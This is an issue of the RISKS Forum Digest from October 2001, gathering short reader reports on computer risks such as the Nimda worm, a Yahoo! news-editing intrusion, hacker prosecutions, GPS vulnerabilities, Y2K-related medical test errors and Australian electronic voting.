Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit precedence: bulk Subject: Risks Digest 21.67 RISKS-LIST: Risks-Forum Digest Monday 1 October 2001 Volume 21 : Issue 67 FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at and by anonymous ftp at ftp.sri.com, cd risks . Contents: Aftermath of 11 September 2001 (PGN) GAO reports on terrorism (Monty Solomon) Warding off cyberterrorist attacks (NewsScan) Hackers face life imprisonment under 'Anti-Terrorism' Act (Monty Solomon) Gartner "Nimda Worm shows you can't always patch fast enough" (Alistair McDonald) Hacker re-writes Yahoo! news stories (Gary Stock) YAHA: Yet Another Hotmail Attack (Alistair McDonald) Hackers and others win big in Net casino attacks (Ken Nitz) Creator of Kournikova virus gets 150 hours of community service (Abigail) "Good Samaritan" hacker pleads guilty to breaking and entering (Declan McCullagh) U.S. court shuts down deceptive Web sites (Jim Griffith) Report on vulnerabilities of GPS (Joseph Bergin) All public hospitals in Gothenburg Sweden Crippled by nimda (Peter Håkanson) Y2K flaw blamed for Down's Syndrome test errors (Les Weston) Re: Oxygen tank kills MRI exam subject (PGN) E-voting in Australia (Tony Jones) Australians voice anger over online spying (Monty Solomon) World Trade Center in RISKS (Jay R. Ashworth) We only reveal a few digits of your account number, don't worry (Dan Jacobson) X-ray machine risk (Asa Bour) Increasing RISKS of UPPER CASE (Stuart Prescott) 2002 USENIX Annual Technical Conference - Call for papers (Ann Tsai) Abridged info on RISKS (comp.risks) ---------------------------------------------------------------------- Date: Mon, 1 Oct 2001 11:06:12 PDT From: "Peter G. Neumann" Subject: Aftermath of 11 September 2001 The Risks Forum has long advocated the importance of increased awareness of risks and avoidance of critical systems with too many inherent weak links. On 11 Sep 2001, the Internet stood up well and was a very important source of information; land-based and cellular telephone systems experienced major outages in lower Manhattan. A few companies such as Cantor-Fitzgerald and eSpeed suffered huge personnel losses, but were nevertheless able to resume operations quickly -- through various combinations of advanced planning and rapid recovery strategies. There are many lessons that are worth recording here, so I would like to invite some of you to contribute short but pithy items on what was achieved, what was learned, and what insights you might have gained. [Thanks to Scott Rainey for encouraging me to do this.] ------------------------------ Date: Thu, 20 Sep 2001 17:28:02 -0400 From: "monty solomon" Subject: GAO reports on terrorism Combating Terrorism: Selected Challenges and Related Recommendations. GAO-01-822, September 20. http://www.gao.gov/new.items/d01822.pdf Aviation Security: Terrorist Acts Demand Urgent Need to Improve Security at the Nation's Airports, by Gerald L. Dillingham, director, physical infrastructure issues, before the Senate Committee on Commerce, Science, and Transportation. GAO-01-1162T, September 20. http://www.gao.gov/new.items/d011162t.pdf Aviation Security: Terrorist Acts Illustrate Severe Weaknesses in Aviation Security, by Gerald L. Dillingham, director, physical infrastructure, before a joint hearing of the Senate and House Appropriations Subcommittees on Transportation and Related Agencies. GAO-01-1166T, September 20. http://www.gao.gov/new.items/d011166t.pdf ------------------------------ Date: Mon, 01 Oct 2001 08:19:36 -0700 From: "NewsScan" Subject: Warding off cyberterrorist attacks Internet experts believe that the threat of cyber-attacks are increasing, though not necessarily from Osama bin Laden's AlQaida network, which seems focused on destroying physical targets and killing civilians. Georgetown University computer science professor Dorothy Denning says, "It's my understanding that they're not teaching this in the terrorist-training camps," but rather that the danger comes from "these thousands of affiliates or sympathizers." Stephen Northcutt, who runs an information warfare simulation for the SANS Institute, warns that terrorist could "potentially paralyze commerce" and might be able to "accomplish a cascading failure of the electronic grid." (*San Jose Mercury News*, 1 Oct 2001; NewsScan Daily, 1 October 2001; http://www.siliconvalley.com/docs/news/depth/cyber100101.htm) [Also, there is clearly renewed interest in off-site backup data storage. PGN] ------------------------------ Date: Tue, 25 Sep 2001 16:32:58 -0400 From: Monty Solomon Subject: Hackers face life imprisonment under 'Anti-Terrorism' Act Hackers face life imprisonment under 'Anti-Terrorism' Act; Justice Department proposal classifies most computer crimes as acts of terrorism By Kevin Poulsen, 23 Sep 2001 Hackers, virus-writers and web site defacers would face life imprisonment without the possibility of parole under legislation proposed by the Bush Administration that would classify most computer crimes [and maybe noncrimes (PGN)?] as acts of terrorism. The Justice Department is urging Congress to quickly approve its Anti-Terrorism Act (ATA), a twenty-five page proposal that would expand the government's legal powers to conduct electronic surveillance, access business records, and detain suspected terrorists. [See http://www.securityfocus.com/news/257 for the full item. PGN] ------------------------------ Date: Fri, 21 Sep 2001 13:07:00 +0100 From: Alistair McDonald Subject: Gartner "Nimda Worm shows you can't always patch fast enough" Gartner is recommending that IIS users who have been hit by the recent MS exploits should "immediately" consider moving to alternatives such as Apache or iPlanet. http://www4.gartner.com/DisplayDocument?doc_cd=101034 But when will those in control take note? I'm sure that a lot of NT/200 sysadmins (and especially Webmasters) are aware of the limitations of their platform, but corporate strategy means that they are a "Microsoft shop". Alistair McDonald Bacchus Consultancy www.bacchusconsultancy.com ------------------------------ Date: Mon, 24 Sep 2001 09:50:34 -0400 From: Gary Stock Subject: Hacker re-writes Yahoo! news stories Will Knight, New Scientist, 20 Sep 01 http://www.newscientist.com/news/news.jsp?id=ns99991329 A computer security expert has revealed how he altered news articles posted to Yahoo!'s web site without permission. The incident highlights the danger of hackers posting misleading information to respected news outlets. Freelance security consultant Adrian Lamo demonstrated that, armed only with an ordinary Internet browser, he could access the content management system used by Yahoo!'s staff use to upload daily news. He added the false quotes to stories to prove the hole was real to computer specialist site Security Focus. Yahoo! has issued a statement saying the vulnerability has been fixed and security is being reviewed. But experts say that the incident demonstrates a serious risk. "Just think how much damage you could do by changing the quarterly results of a company in a story," says J J Gray, a consultant with computer consultants @Stake. Gary Stock, CIO & Technical Compass, Nexcerpt, Inc. 1-616.226.9550 gstock@nexcerpt.com ------------------------------ Date: Fri, 21 Sep 2001 09:49:00 +0100 From: Alistair McDonald Subject: YAHA: Yet Another Hotmail Attack Yet another attack on hotmail. Computing (20 Sept 2001) reports that one can hack the hotmail web site, and redirect users to another site. This brings up the possibility of password collecting. The hacker, known as "Oblivion", reported this to the bugtraq mailing list. The exploit involves smuggling javascript code through the filters used at hotmail. Alistair McDonald Bacchus Consultancy www.bacchusconsultancy.com ------------------------------ Date: Mon, 10 Sep 2001 09:14:27 -0700 From: Ken Nitz Subject: Hackers and others win big in Net casino attacks http://news.excite.com/news/r/010910/11/net-tech-gambling-hacking-dc [The article is on risks in on-line gambling, and particularly CryptoLogic, Inc., a Canadian on-line casino games developer that has been hacked. One of their sites had been "fixed" so that craps and video slot players could not lose, with winnings totalling $1.9 million. Every dice throw turned up doubles, and every slot spin generated a perfect match. Whether it was an insider attack or a penetration is not clear from the article. (We noted the likelihood of hacking of Internet gambling sites in RISKS-19.27, 1 Aug 1997, not to mention my 1995 April Fool's piece in RISKS-17.02.) Interesting question: which laws against hacking will apply to subversions of illegal Internet gambling parlors? Who gets to prosecute remote attacks on off-shore operations? PGN-ed] ------------------------------ Date: Fri, 28 Sep 2001 01:16:42 +0200 From: "Abigail" Subject: Creator of Kournikova virus gets 150 hours of community service >From http://www.volkskrant.nl/nieuws/nieuwemedia/1001567916953.html (in Dutch). 27 Sep 2001 The 20-year-old creator for the Kournikova virus, J. de W. from Sneek, was sentenced to 150 hours of community service by the court of Leeuwarden this Thursday. The prosecution demanded the maximum of 240 hours of community service. In February De W. released on the Internet the so-called wormvirus, which spread itself as an e-mail message. The virus was activated by clicking the e-mail which was titled Anna Kournikova (the tennis player). This lead to inconvenience of Internet users all over the world. When determining the sentence, the court took into consideration that the boy had no previous run-in with justice, that he turned himself in, and that material damages were limited. The American investigation service FBI reported an amount of $166.827 in damages. ------------------------------ Date: Thu, 27 Sep 2001 12:53:53 -0400 From: Declan McCullagh Subject: FC: "Good Samaritan" hacker pleads guilty to breaking and entering [Follow-up on RISKS-21.62 items. PGN] 'Good Sam' Hacker 'Fesses Up, By Declan McCullagh, 27 Sep 2001 declan@wired.com It seemed like such a straightforward example of prosecutorial misconduct: An Oklahoma man was being investigated by the Justice Department for helping a newspaper fix a Web site security hole. The outcry among the geek community last month began with an uncritical story on LinuxFreak.org entitled "Cyber Citizen Lands Felony Charges?" Sites such as Slashdot soon picked up the sad tale of 24-year-old Brian K. West as evidence of out-of-control, tech-clueless government lawyers, and urged everyone to e-mail the U.S. Attorney in charge of the prosecution. Making the story even more appealing to the open-source community was the Microsoft angle: West was said to have reported to the Poteau (Oklahoma) Daily News and Sun a security flaw in Microsoft NT 4.0 IIS and Microsoft FrontPage. But a guilty plea that West signed tells a far different story -- and shows how easily a well-meaning community of programmers and system administrators can be led astray. http://www.wired.com/news/politics/0,1283,47146,00.html [Politech archive on U.S. v. Brian K. West: http://www.politechbot.com/cgi-bin/politech.cgi?name=sperling] [PGN-excerpted from the Sperling release: While probing the site, defendant made copies of six proprietary Practical Extraction Report Language (PERL) scripts that were part of the source code running the PDNS Web page. Defendant also obtained password files from PDNS and used those passwords to access other parts of the PDNS Web page. Defendant electronically shared the scripts and the password files for the PDNS Webs ite with another individual. Defendant's access to the Web page involved interstate communications. ...] ------------------------------ Date: Mon, 1 Oct 2001 14:59:23 -0500 (CDT) From: griffith@olagrande.net Subject: U.S. court shuts down deceptive Web sites Reuters reports that the U.S. District Court in Philadelphia has ordered John Zuccarina to shut down sites operated by him. The Federal Trade Commission filed a complaint against Zuccarina, claiming that he has purchased domain names which are misspellings or other "one-offs" of popular sites, which he uses to "blitz" unsuspecting visitors with pop-up ads, from which the user cannot escape, in order to receive advertising revenue (estimated between $800K and $1 million). Zuccarina has registered some 5500 domains, including www.annakurnikova.com, 41 variants of "Britney Spears", and others. http://www0.mercurycenter.com/breaking/docs/081329.htm ------------------------------ Date: Tue, 11 Sep 2001 07:31:31 -0400 From: Joseph Bergin Subject: Report on vulnerabilities of GPS Yesterday (10 Sept. 2001) the U.S. Transportation dept released a report on the vulnerabilities of the Global Positioning System. The report can be obtained from http://www.navcen.uscg.gov/gps/geninfo/pressrelease.htm There is a short story about it in *The New York Times 11 Sep 2001: http://www.nytimes.com/2001/09/11/national/11NAVI.html The report notes that GPS is being increasingly relied on for life-critical performance in transportation and recommends that various backups be maintained and new ones developed. Joseph Bergin, Professor, Pace University, Computer Science, One Pace Plaza, NY NY 10038 berginf@pace.edu HOMEPAGE http://csis.pace.edu/~bergin/ ------------------------------ Date: Tue, 25 Sep 2001 10:42:55 +0200 From: Peter Håkanson Subject: All public hospitals in Gothenburg Sweden Crippled by nimda The hospitals in "Västra Götaland" sweden (west coast, population 1M) were isolated fron Internet during 23 Sep 2001. Some of internal networks had to be partitioned to prevent nimda spreading further. Reservations and computer-based medical records were unavailable. http://www.vgregion.se The fact that a hospital chain has so relaxed security is amazing. It's also amazing that whole organizations are kept hostage of a vendor that's not even cost-effective. What would happen in case we get a *real* threat to security?? Peter Håkanson, IPSec sverige, Bror Nilssons gata 16 Lundbystrand S-417 55 Gothenburg Sweden "Safe by design" +46707328101 peter@ipsec.nu ------------------------------ Date: Fri, 14 Sep 2001 13:24:33 +0100 From: Les Weston Subject: Y2K flaw blamed for Down's Syndrome test errors The Y2K problem is being blamed for incorrect Down's Syndrome results being given to more than 150 pregnant women throughout northern England between January and May last year. As a result, four Down's syndrome pregnancies went undetected. Amongst other factors, the mother's age is used to assess her risk category. Only those in the high-risk category undergo further tests for the syndrome. Staff noticed the strange results coming from the system, but initially thought they was due to a different mix of women being tested. Full report: http://news.bbc.co.uk/hi/english/health/newsid_1541000/1541557.stm Les Weston, Quinag-CSL, Edinburgh. [Also noted by several others. TNX. Overconfidence in the PathLAN computer was blamed for errors, occurring between 4 Jan and 24 May 2001. PGN] ------------------------------ Date: Sun, 30 Sep 2001 10:44:16 PDT From: "Peter G. Neumann" Subject: Re: Oxygen tank kills MRI exam subject (RISKS-21.55) Westchester Medical Center was fined $22,000 for 11 violations related to the death of the 6-year-old boy killed by the magnetically attracted stray oxygen tank carried into the room by a doctor. http://www.newsday.com/news/nationworld/wire/sns-ap-mri-death0928sep28.story ------------------------------ Date: Sun, 23 Sep 2001 06:31:10 +1000 (EST) From: tmj@enternet.com.au (Tony Jones) Subject: E-voting in Australia On 20 October 2001 there will be an election of members of the Legislative Assembly of the Australian Capital Territory. It is hoped that about 9% of voting will be done using a new electronic voting system. Further details are at . For the electronic system, no independently verifiable copy of a voter's choices will be kept. The selections made by a voter and displayed on the monitor of the voting computer will be, we're led to believe, what go into the duplicated databases for counting. RISKS readers will be reassured to know that (see ): "The new software will be subjected to extensive testing to ensure it is accurate and secure, as well as easy to use. The software will be used on standard computer hardware, that will not be connected to any external networks. The system will also include numerous backups and safeguards to ensure that voting data will not be lost. This will guarantee the security of the electronic voting and counting processes," Mr Green [the ACT Electoral Commissioner] said. I hope Murphy is not eligible to vote. [Actually, given the flakiness and lack of security in existing all-electronic voting systems, it is likely that Murphy's entire surrogate extended family will be able to vote repeatedly, many times over. PGN] ------------------------------ Date: Sat, 8 Sep 2001 13:08:38 -0400 From: Monty Solomon Subject: Australians voice anger over online spying Australians voice anger over online spying By Rachel Lebihan, ZDNet Australia News, 07 September 2001 Only three percent of surveyed ZDNet readers believe Internet Service Providers should monitor all user activity, following a parliamentary report that recommends user logs should be kept on customers' online activities. The diminutive support for tighter online monitoring was transcended by a resounding 60 percent of polled readers who said they would kick up a fuss until the law was changed, if ISPs were forced to maintain access logs. http://www.zdnet.com.au/news/breakingnews/story/0,2000020826,20259325,00.htm ------------------------------ Date: Tue, 11 Sep 2001 16:36:04 -0400 From: "Jay R. Ashworth" Subject: World Trade Center in RISKS In light of this morning's events, which I will not minimize by trying to select an adjective to describe, I thought it might be interesting to search the RISKS archives, and see how the building's history figures in that sphere. First, there's coverage of the car bombing, and how the evac plan and generators failed, in http://catless.ncl.ac.uk/Risks/14.37.html#subj4.1 with follow-on in http://catless.ncl.ac.uk/Risks/14.38.html#subj5.1 http://catless.ncl.ac.uk/Risks/14.39.html#subj8.3 There's other coverage of the bombing, as well, in http://catless.ncl.ac.uk/Risks/14.39.html#subj8.2 which discusses how the building operators are allowed to violate the building codes that they would be otherwise bound by. Also, http://catless.ncl.ac.uk/Risks/14.39.html#subj8.2 discusses the fact that damned near every TV and most of the radio broadcast antennas serving NYC and Eastern NY State just hit the ground as well; that had to be making life miserable for people trying to get the word out. http://catless.ncl.ac.uk/Risks/14.41.html#subj1.1 discusses an ATM outage in NJ attributable to the evac from that bombing. Another outage in California happened at least in part because the backup systems were otherwise occupied due to that same situation: http://catless.ncl.ac.uk/Risks/14.41.html#subj2.1 http://catless.ncl.ac.uk/Risks/17.17.html#subj10.1 notes in passing that the WTC is not alone in having such problems. [Discussion of the Citicorp problems and unlikely events. PGN] Jay R. Ashworth, Member of the Technical Staff, Baylink, Tampa Bay, Florida http://baylink.pitas.com +1 727 804 5015 jra@baylink.com ------------------------------ Date: 12 Sep 2001 13:04:10 +0800 From: Dan Jacobson Subject: We only reveal a few digits of your account number, don't worry > Re: Consumer Reports password policy risks (Bumgarner, RISKS-21.65) > ... but does give the last five digits Sounds like the Taiwan power company sending bills with only the last few digits of your auto-payment bank account revealed, the phone company sending theirs with only the first few digits revealed. Steal two envelopes and you've got the account number? http://www.geocities.com/jidanni/ Tel+886-4-25854780 ------------------------------ Date: Thu, 27 Sep 2001 23:16:04 -0400 (EDT) From: Asa Bour Subject: X-ray machine risk I had to get some x-rays recently. I felt real confident when I saw a bright yellow post-it note on the x-ray machine with bold print stating that the measurements were in mm (millimeters) and not in cm (centimeters). Since the note was needed, one can assume they had problems with people calibrating the machine properly with the right units. I think the x-ray software interface needs some improvement to eliminate this danger of miscalibration. E. Asa Bour http://www.scripturememory.org/ http://www.schemer.com/ ------------------------------ Date: Mon, 24 Sep 2001 16:18:34 +1000 From: Stuart Prescott Subject: Increasing RISKS of UPPER CASE I recently received a confirmation e=mail from an Australian domestic airline confirming a booking I had made over the web. The entire e-mail was in capitals (were they shouting at me or was it all "very important"?) including a little URL at the bottom for more information on in-flight health: > SOME STUDIES HAVE CONCLUDED THAT PROLONGED IMMOBILITY MAY BE A RISK > FACTOR IN THE FORMATION OF BLOOD CLOTS IN THE LEGS, > (DVT - DEEP VEIN THROMBOSIS). IF YOU FEEL YOU MAY BE AT RISK FROM > DVT OR OTHER HEALTH PROBLEMS, QANTAS RECOMMENDS YOU CONSULT WITH > YOUR DOCTOR BEFORE TRAVEL. INFORMATION ON HEALTH ISSUES CAN BE > FOUND ON OUR WEBSITE - > WWW.QANTAS.COM.AU/FLIGHTS/ESSENTIALS/HEALTHINFLIGHT.HTML, > IN OUR TIMETABLE AND INFLIGHT MAGAZINE OR CONTACT YOUR LOCAL QANTAS > OFFICE. No prizes for guessing whether or not the all-uppercase URL works... So the RISKS... other than making the entire message much harder to read, you can also break things. ------------------------------ Date: Tue, 18 Sep 2001 13:34:59 -0700 From: Ann Tsai Subject: 2002 USENIX Annual Technical Conference - Call for papers 2002 USENIX Annual Technical Conference, June 9-14, 2002, Monterey, CA http://www.usenix.org/events/usenix02/ Submissions to the General Refereed Sessions Track are due on November 19, 2001. FREENIX is a special track within the USENIX Annual Technical Conference that showcases the latest developments and applications in freely redistributed technology. The FREENIX track covers the full range of software and source code including but not limited to Apache, Darwin, FreeBSD, GNOME, GNU, KDE, Linux, NetBSD, OpenBSD, Perl, PHP, Python, Samba, Tcl/Tk and more. The FREENIX program committee is looking for papers about projects with a solid emphasis on nurturing the open source/freely available software community and talks which advance the state of the art of freely redistributable software. Areas of interest include, but are not limited Submissions to the Freenix Track are due on November 12, 2001. Submission guidelines and conference details are available on our Web site: http://www.usenix.org/events/usenix02/cfp/ The 2002 USENIX Annual Technical Conference is sponsored by USENIX, The Advanced Computing Systems Association. www.usenix.org ------------------------------ Date: 12 Feb 2001 (LAST-MODIFIED) From: RISKS-request@csl.sri.com Subject: Abridged info on RISKS (comp.risks) The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks. => SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) if possible and convenient for you. Alternatively, via majordomo, send e-mail requests to with one-line body subscribe [OR unsubscribe] which requires your ANSWERing confirmation to majordomo@CSL.sri.com . [If E-mail address differs from FROM: subscribe "other-address " ; this requires PGN's intervention -- but hinders spamming subscriptions, etc.] Lower-case only in address may get around a confirmation match glitch. INFO [for unabridged version of RISKS information] There seems to be an occasional glitch in the confirmation process, in which case send mail to RISKS with a suitable SUBJECT and we'll do it manually. .MIL users should contact (Dennis Rears). .UK users should contact . => The INFO file (submissions, default disclaimers, archive sites, copyright policy, PRIVACY digests, etc.) is also obtainable from http://www.CSL.sri.com/risksinfo.html ftp://www.CSL.sri.com/pub/risks.info The full info file will appear now and then in future issues. *** All contributors are assumed to have read the full info file for guidelines. *** => SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line. => ARCHIVES are available: ftp://ftp.sri.com/risks or ftp ftp.sri.comlogin anonymous[YourNetAddress]cd risks [volume-summary issues are in risks-*.00] [back volumes have their own subdirectories, e.g., "cd 20" for volume 20] http://catless.ncl.ac.uk/Risks/VL.IS.html [i.e., VoLume, ISsue]. Lindsay Marshall has also added to the Newcastle catless site a palmtop version of the most recent RISKS issue and a WAP version that works for many but not all telephones: http://catless.ncl.ac.uk/w/r http://the.wiretapped.net/security/info/textfiles/risks-digest/ . http://www.planetmirror.com/pub/risks/ ftp://ftp.planetmirror.com/pub/risks/ ==> PGN's comprehensive historical Illustrative Risks summary of one liners: http://www.csl.sri.com/illustrative.html for browsing, http://www.csl.sri.com/illustrative.pdf or .ps for printing ------------------------------ End of RISKS-FORUM Digest 21.67 ************************